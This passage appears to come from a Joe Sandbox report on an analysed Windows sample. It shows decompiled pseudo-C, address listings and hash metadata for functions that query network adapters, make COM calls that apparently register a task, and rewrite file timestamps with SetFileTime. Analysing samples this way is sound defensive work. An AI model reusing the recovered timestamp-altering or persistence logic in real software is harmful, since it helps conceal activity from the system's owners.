						_t27 = E006E3180(2 +  *(_t54 + 4) * 4, 0);
						_t56 = _t54 + 8;
						 *0x6f9a88 = _t27;
						if(_t27 == 0) {
							goto L18;
						}
						_t38 = _t56 + 0x10;
						E006F4520(_t56 + 0x10, 0x9c);
						_t57 = _t56 + 8;
						_t52 = 0xffffffe0;
						_t48 = 0;
						do {
							_t42 =  *0x6f9a88; // 0x2ffc88
							E006F68E0(_t42 + _t48, 0x100, _t38,  *( *_t57 + _t52 + 0x20) & 0x000000ff);
							_t57 = _t57 + 0x10;
							_t48 = _t48 + 4;
							_t52 = _t52 + 1;
						} while (_t52 != 0);
						_t32 =  *0x6f9a88; // 0x2ffc88
						_t45 =  *((intOrPtr*)(_t57 + 0xc));
						_t36 = 1;
						 *((short*)(_t32 + 0x80)) = 0;
						L14:
						_t18 =  *_t54;
						if( *_t54 != 0) {
							E006E91E0(_t18);
							_t54 = _t54 + 4;
						}
						if(_t45 != 0) {
							E006E91E0(_t49);
						}
						goto L18;
					}
					_t33 = E006E3180( *((intOrPtr*)(_t54 + 0xc)), _t49);
					_t54 = _t54 + 8;
					_t45 = _t33;
					if(_t33 == 0) {
						_t49 = 0;
						_t36 = 0;
						goto L14;
					}
					 *0x6f9f0c(_t45, _t37);
					_t49 = _t45;
					goto L8;
				}
			}

0x006f678a
0x006f678f
0x006f6793
0x006f679b
0x006f679e
0x006f67a4
0x006f67a7
0x006f67ac
0x006f67af
0x006f67af
0x006f67c0
0x006f67c5
0x006f67c8
0x006f67cc
0x006f6802
0x006f6804
0x00000000
0x006f67ce
0x006f67ce
0x006f67d4
0x006f67dd
0x006f680b
0x006f680d
0x006f6810
0x006f6814
0x006f681f
0x006f6824
0x006f6825
0x006f6826
0x006f682c
0x006f6831
0x006f6835
0x006f68d1
0x006f68dd
0x006f68dd
0x006f6849
0x006f684e
0x006f6853
0x006f6858
0x00000000
0x00000000
0x006f685a
0x006f6864
0x006f6869
0x006f686c
0x006f6871
0x006f6873
0x006f6876
0x006f688b
0x006f6890
0x006f6893
0x006f6896
0x006f6896
0x006f6899
0x006f689e
0x006f68a4
0x006f68a5
0x006f68b4
0x006f68b4
0x006f68b9
0x006f68bc
0x006f68c1
0x006f68c1
0x006f68c6
0x006f68c9
0x006f68ce
0x00000000
0x006f68c6
0x006f67e4
0x006f67e9
0x006f67ec
0x006f67f0
0x006f68b0
0x006f68b2
0x00000000
0x006f68b2
0x006f67f8
0x006f67fe
0x00000000
0x006f67fe

APIs

GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 006F67D4
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 006F67F8

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: AdaptersInfo$FreeHeap
String ID:
API String ID: 1341788161-0
Opcode ID: 1debb83fe340d56bde674948a0b90f59abcd3d5f012676736a245ce247a1879c
Instruction ID: 891175cb99507a5179271575f43600d8567f582a1fad33d7f5098f4837dc5f87
Opcode Fuzzy Hash: 1debb83fe340d56bde674948a0b90f59abcd3d5f012676736a245ce247a1879c
Instruction Fuzzy Hash: AC3128B1A053096BE7109B65EC85BB7779AAF80388F14443CFA58C7341EA70DD08C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 006E3200, Relevance: 29.1, APIs: 19, Instructions: 566
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E006E3200(signed int _a4, signed int _a8, signed int _a12) {
				void* _v16;
				void* _v20;
				char _v600;
				char _v612;
				char _v716;
				char _v764;
				struct _SECURITY_ATTRIBUTES* _v768;
				struct _SECURITY_ATTRIBUTES* _v772;
				signed int _v776;
				struct _SECURITY_ATTRIBUTES* _v780;
				struct _SECURITY_ATTRIBUTES* _v784;
				struct _SECURITY_ATTRIBUTES* _v788;
				struct _SECURITY_ATTRIBUTES* _v792;
				struct _SECURITY_ATTRIBUTES* _v796;
				struct _SECURITY_ATTRIBUTES* _v800;
				struct _SECURITY_ATTRIBUTES* _v804;
				struct _SECURITY_ATTRIBUTES* _v808;
				char _v812;
				struct _SECURITY_ATTRIBUTES* _v816;
				char _v820;
				WCHAR* _v824;
				char _v828;
				char _v832;
				intOrPtr _v912;
				char _v916;
				intOrPtr _v920;
				char _v924;
				signed int _v928;
				char _v932;
				long _v936;
				long _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				void* _v956;
				intOrPtr _v960;
				struct _SECURITY_ATTRIBUTES* _v968;
				signed int _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				WCHAR* _v984;
				char _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				char _v1004;
				intOrPtr _v1008;
				struct _SECURITY_ATTRIBUTES* _v1012;
				intOrPtr _v1016;
				intOrPtr* _v1020;
				signed int _v1024;
				char _v1028;
				intOrPtr _v1032;
				signed int _v1036;
				short _v1040;
				intOrPtr _v1044;
				char _v1048;
				intOrPtr _v1052;
				char _v1056;
				signed int _v1060;
				WCHAR* _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				signed int _v1080;
				char _v1084;
				long _v1088;
				signed int _v1092;
				intOrPtr _v1096;
				signed int _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				WCHAR* _v1112;
				intOrPtr _v1116;
				FILETIME* _v1120;
				void* _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				signed int* _v1140;
				char _v1144;
				char _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				signed int _v1164;
				FILETIME* _v1168;
				void* _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				signed int* _v1188;
				signed int _v1192;
				WCHAR* _v1196;
				intOrPtr _v1200;
				WCHAR* _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr* _v1216;
				intOrPtr* _v1224;
				char _v1228;
				signed int* _v1292;
				signed int* _v1296;
				intOrPtr _v1300;
				signed int _v1308;
				intOrPtr* _t281;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t298;
				signed int _t299;
				void* _t300;
				signed int _t302;
				signed int _t314;
				void* _t315;
				signed int _t318;
				long _t325;
				long _t328;
				intOrPtr* _t333;
				intOrPtr _t335;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				signed int _t349;
				signed int _t353;
				intOrPtr* _t369;
				void* _t371;
				signed int _t372;
				signed int _t374;
				signed int _t386;
				signed int _t387;
				signed int _t391;
				signed int _t392;
				signed int _t397;
				signed int _t398;
				signed int _t402;
				signed int _t403;
				void* _t410;
				void* _t412;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				FILETIME* _t419;
				char* _t424;
				char* _t425;
				signed int _t426;
				FILETIME* _t441;
				signed int* _t464;
				signed int _t471;
				signed int _t472;
				signed int* _t473;
				intOrPtr* _t477;
				void* _t487;
				char* _t489;
				intOrPtr* _t491;
				intOrPtr* _t492;
				FILETIME* _t494;
				signed int _t497;
				signed int _t498;
				intOrPtr* _t499;
				signed int _t500;
				void* _t501;
				signed int _t503;
				intOrPtr* _t506;
				void* _t508;
				signed int* _t511;
				char* _t512;
				void* _t513;
				signed int _t514;
				signed int _t518;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t525;
				void* _t527;
				void* _t532;

				if( *0x6f9aa8 != 0) {
					_t514 = _t518;
					_t520 = (_t518 & 0xfffffff8) - 0x3f0;
					_t281 =  *0x6f9aa8; // 0x5b8f68
					_v1012 = 0;
					_v956 = 0;
					_v968 = 0;
					_v812 = 0;
					_v816 = 0;
					_v820 = 0;
					_v824 = 0;
					_v764 = 0;
					_v768 = 0;
					_v772 = 0;
					_v776 = 0;
					_v780 = 0;
					_v784 = 0;
					_v788 = 0;
					_v792 = 0;
					_v796 = 0;
					_v800 = 0;
					_v804 = 0;
					_v808 = 0;
					_v1020 = _t281;
					_v1016 =  *_t281;
					_v988 = _v764;
					_v972 = _v776;
					_v992 = _v784;
					_v976 = _v792;
					_v996 = _v796;
					_v1000 = _v800;
					_v980 = _v808;
					_v1004 = _v812;
					_v1008 = _v816;
					_v984 = _v824;
					_t288 =  *((intOrPtr*)(_v1016 + 0x28))(_v1020, _v984, _v820, _v1008, _v1004, _v980, _v804, _v1000, _v996, _v976, _v788, _v992, _v780, _v972, _v772, _v768, _v988, _t501, _t487, _t410, _t513);
					__eflags = _t288;
					if(_t288 < 0) {
						_t503 = _t288;
						_t489 =  &_v600;
						_push(0x91);
						goto L29;
					} else {
						_t298 =  *0x6f9aa8; // 0x5b8f68
						_t299 =  *((intOrPtr*)( *_t298 + 0x1c))(_t298, 0,  &_v1080);
						__eflags = _t299;
						if(_t299 < 0) {
							_t503 = _t299;
							_t489 =  &_v612;
							_push(0x90);
							L29:
							_push(_t489);
							E006F4520();
							_t521 = _t520 + 8;
							_push(_t503);
							_push(_t489);
							goto L30;
						} else {
							_t505 = _a4;
							_t300 = E006E3240(_v1092, _a4, 0); // executed
							_t522 = _t520 + 0xc;
							__eflags = _t300 - 0x3ff;
							if(_t300 > 0x3ff) {
								_t412 = 0;
								__eflags = 0;
								 *0x6f9bf8 = 3;
								goto L33;
							} else {
								_t302 = E006E26D0( &_v1048, 1, _t505);
								_t525 = _t522 + 0xc;
								__eflags = _t302;
								if(_t302 == 0) {
									_push(0x92);
									goto L42;
								} else {
									_t506 =  &_v612;
									E006F4520(_t506, 0x21);
									E006F4520( &_v812, 0x20);
									_t527 = _t525 + 0x10;
									_t415 =  *0x6f9de0;
									_t491 =  &_v832;
									_v1100 = _v1092;
									 *_t415(_t491);
									_v916 =  *((intOrPtr*)(_t491 + 8));
									_t492 =  &_v956;
									_v912 =  *((intOrPtr*)(_t491 + 0xc));
									_v924 =  *_t491;
									_v920 =  *((intOrPtr*)(_t491 + 4));
									 *_t415(_t492);
									_v1040 = 8;
									_v932 =  *((intOrPtr*)(_t492 + 0xc));
									_v940 =  *((intOrPtr*)(_t492 + 4));
									_v936 =  *(_t492 + 8);
									_v944 =  *_t492;
									_t314 =  *0x6f9dd4(_t506);
									__eflags = _t314;
									_v1036 = _t314;
									if(_t314 == 0) {
										L66:
										asm("int3");
										asm("int3");
										_push(_t514);
										_push(_t415);
										_push(_t492);
										_push(_t506);
										_t416 = 0;
										_t315 = CreateFileW(_v1112, 0x100, 1, 0, 3, 0, 0);
										__eflags = _t315 - 0xffffffff;
										if(_t315 != 0xffffffff) {
											_t471 = _a4;
											_t441 = 0;
											_t508 = _t315;
											_t494 = 0;
											__eflags = _t471;
											if(_t471 != 0) {
												_t494 =  &_v1148;
												_t328 = 0x989680 *  *_t471 + 0xd53e8000;
												__eflags = _t328;
												asm("adc edx, ebx");
												_t494->dwLowDateTime = _t328;
												_t494->dwHighDateTime = 0x989680 *  *_t471 >> 0x20;
											}
											_t472 = _a8;
											__eflags = _t472;
											if(_t472 != 0) {
												_t441 =  &_v1156;
												_t325 = 0x989680 *  *_t472 + 0xd53e8000;
												__eflags = _t325;
												asm("adc edx, ebx");
												_t441->dwLowDateTime = _t325;
												_t441->dwHighDateTime = 0x989680 *  *_t472 >> 0x20;
											}
											__eflags = _a12;
											if(_a12 == 0) {
												_t419 = 0;
												__eflags = 0;
											} else {
												_t473 = _a12;
												_v1168 = _t441;
												_v1172 = _t508;
												_t419 =  &_v1164;
												_t441 = _v1168;
												asm("adc edx, edi");
												_t508 = _v1172;
												_t419->dwLowDateTime = 0x989680 *  *_t473 + 0xd53e8000;
												_t419->dwHighDateTime = 0x989680 *  *_t473 >> 0x20;
											}
											_t318 = SetFileTime(_t508, _t494, _t441, _t419);
											__eflags = _t318;
											_t279 = _t318 != 0;
											__eflags = _t279;
											_t416 = 0 | _t279;
											CloseHandle(_t508);
										}
										return _t416;
									} else {
										_t415 = _v1060;
										_v968 = _v1032;
										_v976 = _v1040;
										_v972 = _v1036;
										_v980 = _v1044;
										_t333 = E006E5140(0xc);
										_t527 = _t527 + 4;
										_t506 = _t333;
										 *((intOrPtr*)(_t506 + 4)) = 0;
										 *(_t506 + 8) = 1;
										_t335 =  *0x6f9dd4(_t415);
										__eflags = _t415;
										 *_t506 = 0;
										if(_t415 == 0) {
											L11:
											_v1068 = _t335;
											_v1112 = _t506;
											_t336 = E006E5140(0xc);
											_t527 = _t527 + 4;
											 *(_t336 + 4) = 0;
											_t415 = _t336;
											 *(_t336 + 8) = 1;
											_t338 =  *0x6f9dd4( &_v828);
											__eflags = _t338;
											 *_t415 = _t338;
											if(__eflags == 0) {
												goto L66;
											} else {
												_t477 = _v1120;
												_v1076 =  *_t477;
												_v1108 = _v928;
												_v1060 = _v932;
												_v1088 = _v940;
												_v1092 = _v944;
												_v1096 = _v948;
												_v1080 = _v956;
												_v1100 = _v976;
												_v1104 = _v980;
												_v1084 = _v988;
												_v1064 = _v984;
												_t340 =  *((intOrPtr*)(_v1076 + 0x40))(_t477, _t338, _v1072, 6, _v1084, _v1064, _v1104, _v1100, _v1080, _v952, _v1096, _v1092, 5, _v1088, _v936, _v1060, _v1108,  &_v1056);
												asm("lock dec dword [ebx+0x8]");
												_t497 = _t340;
												_t511 = _v1188;
												if(__eflags == 0) {
													_t402 =  *_t415;
													__eflags = _t402;
													if(_t402 != 0) {
														 *0x6f9dd8(_t402);
														 *_t415 = 0;
													}
													_t403 =  *(_t415 + 4);
													__eflags = _t403;
													if(_t403 != 0) {
														L006F7400(_t403);
														_t527 = _t527 + 4;
													}
													L006F7400(_t415);
													_t527 = _t527 + 4;
												}
												asm("lock dec dword [esi+0x8]");
												_t424 =  &_v924;
												if(__eflags == 0) {
													_t397 =  *_t511;
													__eflags = _t397;
													if(_t397 != 0) {
														 *0x6f9dd8(_t397);
														 *_t511 = 0;
													}
													_t398 = _t511[1];
													__eflags = _t398;
													if(_t398 != 0) {
														L006F7400(_t398);
														_t527 = _t527 + 4;
													}
													L006F7400(_t511);
													_t527 = _t527 + 4;
												}
												_t506 =  *0x6f9ddc;
												 *_t506( &_v1124);
												 *_t506( &_v1048);
												 *_t506(_t424);
												__eflags = _t497;
												if(_t497 < 0) {
													__eflags = _t497 - 0x80070005;
													if(_t497 != 0x80070005) {
														_t512 =  &_v716;
														E006F4520( &_v716, 0x94);
														_t521 = _t527 + 8;
														_push(_t497);
														goto L63;
													} else {
														_t349 = E006E26D0( &_v1152, 0, _a4);
														_t525 = _t527 + 0xc;
														__eflags = _t349;
														if(_t349 == 0) {
															_push(0x93);
															L42:
															_push( *0x6f9bb8);
															E006F4520();
															_t522 = _t525 + 8;
															goto L31;
														} else {
															E006F4520( &_v916, 0x20);
															_v1204 = _v1196;
															_t353 =  *0x6f9de0;
															_t498 = _t353;
															 *_t353(_t424);
															_v1080 = _v928;
															_v1088 = _v936;
															_v1084 = _v932;
															_v1092 = _v940;
															 *_t498( &_v1060);
															_v1100 = _v1052;
															_v1108 = _v1060;
															_v1104 = _v1056;
															_v1112 = _v1064;
															 *_t498( &_v1144);
															_t415 = _v1164;
															_v1120 = _v1136;
															_v1128 = _v1144;
															_v1124 = _v1140;
															_v1132 = _v1148;
															_t369 = E006E5140(0xc);
															_t527 = _t525 + 0xc;
															_t492 = _t369;
															 *((intOrPtr*)(_t492 + 4)) = 0;
															 *(_t492 + 8) = 1;
															_t371 =  *0x6f9dd4(_t415);
															__eflags = _t415;
															_v1216 = _t492;
															 *_t492 = 0;
															if(_t415 == 0) {
																L47:
																_v1172 = _t371;
																_t372 = E006E5140(0xc);
																_t527 = _t527 + 4;
																 *(_t372 + 4) = 0;
																_t415 = _t372;
																 *(_t372 + 8) = 1;
																_t374 =  *0x6f9dd4( &_v932);
																__eflags = _t374;
																 *_t415 = _t374;
																if(__eflags == 0) {
																	goto L66;
																} else {
																	_t499 = _v1224;
																	_v1180 =  *_t499;
																	_v1212 = _v1096;
																	_v1164 = _v1100;
																	_v1192 = _v1108;
																	_v1196 = _v1112;
																	_v1200 = _v1116;
																	_v1184 = _v1124;
																	_v1168 = _v1120;
																	_v1204 = _v1128;
																	_v1208 = _v1132;
																	_v1188 = _v1140;
																	_v960 = _v1136;
																	_v1296 =  *((intOrPtr*)(_v1180 + 0x40))(_t499, _t374, _v1176, 6, _v1188, _v960, _v1208, _v1204, _v1184, _v1168, _v1200, _v1196, 3, _v1192, _v1104, _v1164, _v1212,  &_v1160);
																	asm("lock dec dword [ebx+0x8]");
																	if(__eflags == 0) {
																		_t391 =  *_t415;
																		__eflags = _t391;
																		if(_t391 != 0) {
																			 *0x6f9dd8(_t391);
																			 *_t415 = 0;
																		}
																		_t392 =  *(_t415 + 4);
																		__eflags = _t392;
																		if(_t392 != 0) {
																			L006F7400(_t392);
																			_t527 = _t527 + 4;
																		}
																		L006F7400(_t415);
																		_t527 = _t527 + 4;
																	}
																	_t464 = _v1292;
																	_t500 = _a4;
																	_t425 =  &_v1028;
																	asm("lock dec dword [ecx+0x8]");
																	if(__eflags == 0) {
																		_t386 =  *_t464;
																		__eflags = _t386;
																		if(_t386 != 0) {
																			 *0x6f9dd8(_t386);
																			_t464 = _v1296;
																			 *_t464 = 0;
																		}
																		_t387 = _t464[1];
																		__eflags = _t387;
																		if(_t387 != 0) {
																			L006F7400(_t387);
																			_t464 = _v1292;
																			_t527 = _t527 + 4;
																		}
																		L006F7400(_t464);
																		_t527 = _t527 + 4;
																	}
																	 *_t506( &_v1228);
																	 *_t506( &_v1152);
																	 *_t506(_t425);
																	_t426 = _v1308;
																	__eflags = _t426;
																	if(_t426 < 0) {
																		_t512 =  &_v820;
																		E006F4520( &_v820, 0x95);
																		_t521 = _t527 + 8;
																		_push(_t426);
																		L63:
																		_push(_t512);
																		L30:
																		_push(0x200);
																		_push( *0x6f9bb8);
																		E006F68E0();
																		_t522 = _t521 + 0x10;
																		L31:
																		_t412 = 0;
																		 *0x6f9bf8 = 2;
																		L33:
																		_t413 = _t412 + 1;
																		__eflags = _t413;
																	} else {
																		E006F4520( *0x6f9bb8, 0x65);
																		_t532 = _t527 + 8;
																		 *0x6f9bf8 = 3;
																		_t413 = 1;
																		goto L26;
																	}
																	goto L34;
																}
															} else {
																__eflags = 0;
																if(0 == 0) {
																	goto L66;
																} else {
																	goto L47;
																}
															}
														}
													}
												} else {
													E006F4520( *0x6f9bb8, 0x21);
													_t532 = _t527 + 8;
													__eflags =  *0x6f9ae8;
													_t500 = _a4;
													 *0x6f9bf8 = 3;
													_t151 =  *0x6f9ae8 != 0;
													__eflags = _t151;
													_t413 = 0 | _t151;
													L26:
													E006E3240(_v1300, _t500, 1);
													_t522 = _t532 + 0xc;
													L34:
													_t291 = _v1024;
													__eflags = _t291;
													if(_t291 != 0) {
														 *((intOrPtr*)( *_t291 + 8))(_t291);
													}
													_t292 = _v1080;
													__eflags = _t292;
													if(_t292 != 0) {
														 *((intOrPtr*)( *_t292 + 8))(_t292);
													}
													_t293 = _v1036;
													__eflags = _t293;
													if(_t293 != 0) {
														E006E91E0(_t293);
													}
													return _t413;
												}
											}
										} else {
											__eflags = 0;
											if(0 == 0) {
												goto L66;
											} else {
												goto L11;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t536 =  *0x6f9bf4;
					if( *0x6f9bf4 == 0) {
						E006F4520( *0x6f9bb8, 0x6b);
						__eflags = 0;
						 *0x6f9bf8 = 0;
						return 0;
					} else {
						_push(_a4);
						return E006EDF00(_t536);
					}
				}
			}

0x006e3207
0x006e6811
0x006e6819
0x006e681f
0x006e6826
0x006e682a
0x006e682e
0x006e6832
0x006e6839
0x006e6840
0x006e6847
0x006e684e
0x006e6855
0x006e685c
0x006e6863
0x006e686a
0x006e6871
0x006e6878
0x006e687f
0x006e6886
0x006e688d
0x006e6894
0x006e689b
0x006e68a4
0x006e68a8
0x006e68b3
0x006e68c5
0x006e68de
0x006e68e9
0x006e68fb
0x006e6906
0x006e6911
0x006e6923
0x006e692e
0x006e6939
0x006e697a
0x006e697d
0x006e697f
0x006e6cb0
0x006e6cb2
0x006e6cb9
0x00000000
0x006e6985
0x006e6985
0x006e6994
0x006e6997
0x006e6999
0x006e6cc0
0x006e6cc2
0x006e6cc9
0x006e6cce
0x006e6cce
0x006e6ccf
0x006e6cd4
0x006e6cd7
0x006e6cd8
0x00000000
0x006e699f
0x006e699f
0x006e69a9
0x006e69ae
0x006e69b1
0x006e69b6
0x006e6cfa
0x006e6cfa
0x006e6cfc
0x00000000
0x006e69bc
0x006e69c4
0x006e69c9
0x006e69cc
0x006e69ce
0x006e6d3e
0x00000000
0x006e69d4
0x006e69d4
0x006e69de
0x006e69f0
0x006e69f5
0x006e69fc
0x006e6a02
0x006e6a09
0x006e6a0e
0x006e6a18
0x006e6a22
0x006e6a29
0x006e6a30
0x006e6a37
0x006e6a3f
0x006e6a47
0x006e6a4e
0x006e6a58
0x006e6a5f
0x006e6a68
0x006e6a70
0x006e6a76
0x006e6a78
0x006e6a7c
0x006e704e
0x006e704e
0x006e704f
0x006e7050
0x006e7053
0x006e7054
0x006e7055
0x006e705c
0x006e706d
0x006e7073
0x006e7076
0x006e707c
0x006e707f
0x006e7081
0x006e7088
0x006e708d
0x006e708f
0x006e7096
0x006e709c
0x006e709c
0x006e70a3
0x006e70a5
0x006e70a7
0x006e70a7
0x006e70aa
0x006e70ad
0x006e70af
0x006e70bb
0x006e70c1
0x006e70c1
0x006e70c8
0x006e70ca
0x006e70cc
0x006e70cc
0x006e70d2
0x006e70d4
0x006e710b
0x006e710b
0x006e70d6
0x006e70d6
0x006e70de
0x006e70e7
0x006e70f1
0x006e70f9
0x006e70fd
0x006e7101
0x006e7104
0x006e7106
0x006e7106
0x006e7111
0x006e7119
0x006e711b
0x006e711b
0x006e711b
0x006e711f
0x006e711f
0x006e712e
0x006e6a82
0x006e6a8a
0x006e6a8e
0x006e6a99
0x006e6aa0
0x006e6aab
0x006e6ab8
0x006e6abd
0x006e6ac0
0x006e6ac4
0x006e6ac7
0x006e6acf
0x006e6ad5
0x006e6ad7
0x006e6ad9
0x006e6ae3
0x006e6ae3
0x006e6ae7
0x006e6aed
0x006e6af2
0x006e6af5
0x006e6afc
0x006e6afe
0x006e6b0d
0x006e6b13
0x006e6b15
0x006e6b17
0x00000000
0x006e6b1d
0x006e6b1d
0x006e6b23
0x006e6b2e
0x006e6b39
0x006e6b44
0x006e6b56
0x006e6b61
0x006e6b6c
0x006e6b7e
0x006e6b89
0x006e6b94
0x006e6b9f
0x006e6be0
0x006e6be3
0x006e6be7
0x006e6be9
0x006e6bed
0x006e6bef
0x006e6bf1
0x006e6bf3
0x006e6bf6
0x006e6bfc
0x006e6bfc
0x006e6c02
0x006e6c05
0x006e6c07
0x006e6c0a
0x006e6c0f
0x006e6c0f
0x006e6c13
0x006e6c18
0x006e6c18
0x006e6c1b
0x006e6c1f
0x006e6c26
0x006e6c28
0x006e6c2a
0x006e6c2c
0x006e6c2f
0x006e6c35
0x006e6c35
0x006e6c3b
0x006e6c3e
0x006e6c40
0x006e6c43
0x006e6c48
0x006e6c48
0x006e6c4c
0x006e6c51
0x006e6c51
0x006e6c54
0x006e6c5f
0x006e6c69
0x006e6c6c
0x006e6c6e
0x006e6c70
0x006e6d53
0x006e6d59
0x006e7018
0x006e701b
0x006e7020
0x006e7023
0x00000000
0x006e6d5f
0x006e6d69
0x006e6d6e
0x006e6d71
0x006e6d73
0x006e702a
0x006e6d43
0x006e6d43
0x006e6d49
0x006e6d4e
0x00000000
0x006e6d79
0x006e6d83
0x006e6d8f
0x006e6d94
0x006e6d99
0x006e6d9b
0x006e6dab
0x006e6db9
0x006e6dbd
0x006e6dcb
0x006e6dd7
0x006e6de7
0x006e6df2
0x006e6df6
0x006e6e01
0x006e6e0a
0x006e6e14
0x006e6e18
0x006e6e20
0x006e6e24
0x006e6e2c
0x006e6e36
0x006e6e3b
0x006e6e3e
0x006e6e42
0x006e6e45
0x006e6e4d
0x006e6e53
0x006e6e55
0x006e6e59
0x006e6e5b
0x006e6e65
0x006e6e65
0x006e6e6b
0x006e6e70
0x006e6e73
0x006e6e7a
0x006e6e7c
0x006e6e8b
0x006e6e91
0x006e6e93
0x006e6e95
0x00000000
0x006e6e9b
0x006e6e9b
0x006e6ea1
0x006e6eac
0x006e6eb7
0x006e6ebf
0x006e6ecb
0x006e6ed3
0x006e6edb
0x006e6ee3
0x006e6eeb
0x006e6ef3
0x006e6efb
0x006e6f03
0x006e6f50
0x006e6f54
0x006e6f58
0x006e6f5a
0x006e6f5c
0x006e6f5e
0x006e6f61
0x006e6f67
0x006e6f67
0x006e6f6d
0x006e6f70
0x006e6f72
0x006e6f75
0x006e6f7a
0x006e6f7a
0x006e6f7e
0x006e6f83
0x006e6f83
0x006e6f86
0x006e6f8a
0x006e6f8d
0x006e6f94
0x006e6f98
0x006e6f9a
0x006e6f9c
0x006e6f9e
0x006e6fa1
0x006e6fa7
0x006e6fab
0x006e6fab
0x006e6fb1
0x006e6fb4
0x006e6fb6
0x006e6fb9
0x006e6fbe
0x006e6fc2
0x006e6fc2
0x006e6fc6
0x006e6fcb
0x006e6fcb
0x006e6fd3
0x006e6fdd
0x006e6fe0
0x006e6fe2
0x006e6fe6
0x006e6fe8
0x006e7040
0x006e7043
0x006e7048
0x006e704b
0x006e7024
0x006e7024
0x006e6cd9
0x006e6cd9
0x006e6cde
0x006e6ce4
0x006e6ce9
0x006e6cec
0x006e6cec
0x006e6cee
0x006e6d06
0x006e6d06
0x006e6d06
0x006e6fea
0x006e6ff2
0x006e6ff7
0x006e6ffc
0x006e7006
0x00000000
0x006e7006
0x00000000
0x006e6fe8
0x006e6e5d
0x006e6e5d
0x006e6e5f
0x00000000
0x00000000
0x00000000
0x00000000
0x006e6e5f
0x006e6e5b
0x006e6d73
0x006e6c76
0x006e6c7e
0x006e6c83
0x006e6c88
0x006e6c8f
0x006e6c92
0x006e6c9c
0x006e6c9c
0x006e6c9c
0x006e6c9f
0x006e6ca6
0x006e6cab
0x006e6d07
0x006e6d07
0x006e6d0b
0x006e6d0d
0x006e6d12
0x006e6d12
0x006e6d15
0x006e6d19
0x006e6d1b
0x006e6d20
0x006e6d20
0x006e6d23
0x006e6d27
0x006e6d29
0x006e6d2c
0x006e6d31
0x006e6d3d
0x006e6d3d
0x006e6c70
0x006e6adb
0x006e6adb
0x006e6add
0x00000000
0x00000000
0x00000000
0x00000000
0x006e6add
0x006e6ad9
0x006e6a7c
0x006e69ce
0x006e69b6
0x006e6999
0x006e320d
0x006e320d
0x006e3214
0x006e322b
0x006e3233
0x006e3235
0x006e323f
0x006e3216
0x006e3216
0x006e3222
0x006e3222
0x006e3214

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c5e745150f39a0cd6dd33e9283d45550484b6e7634fd06d5e136477f5079be97
Instruction ID: ad53afd8c46e25f18444f5afea070d6616364146827d76dd66653788731780a1
Opcode Fuzzy Hash: c5e745150f39a0cd6dd33e9283d45550484b6e7634fd06d5e136477f5079be97
Instruction Fuzzy Hash: 613216B5A09380AFD764DF55D880B9BBBE6FF88744F10882DFA8983351E7319944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006E3240, Relevance: 10.7, APIs: 7, Instructions: 234
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E006E3240(intOrPtr* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _v16;
				char _v236;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				char _v264;
				intOrPtr _v272;
				intOrPtr* _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char _v312;
				short _v316;
				intOrPtr _v320;
				char _v328;
				char _v332;
				intOrPtr* _v336;
				void* _v340;
				intOrPtr* _v344;
				intOrPtr _v348;
				intOrPtr* _v352;
				intOrPtr* _v356;
				char _v360;
				WCHAR* _v364;
				WCHAR* _v368;
				WCHAR* _v372;
				WCHAR* _v376;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				void* _t110;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				void* _t117;
				void* _t120;
				intOrPtr* _t121;
				intOrPtr* _t123;
				void* _t126;
				intOrPtr* _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t144;
				char* _t148;
				WCHAR* _t149;
				intOrPtr* _t153;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr* _t172;
				intOrPtr _t180;
				short _t181;
				intOrPtr* _t186;
				intOrPtr* _t188;
				char* _t191;
				signed int _t193;
				void* _t195;

				_t195 = (_t193 & 0xfffffff8) - 0x128;
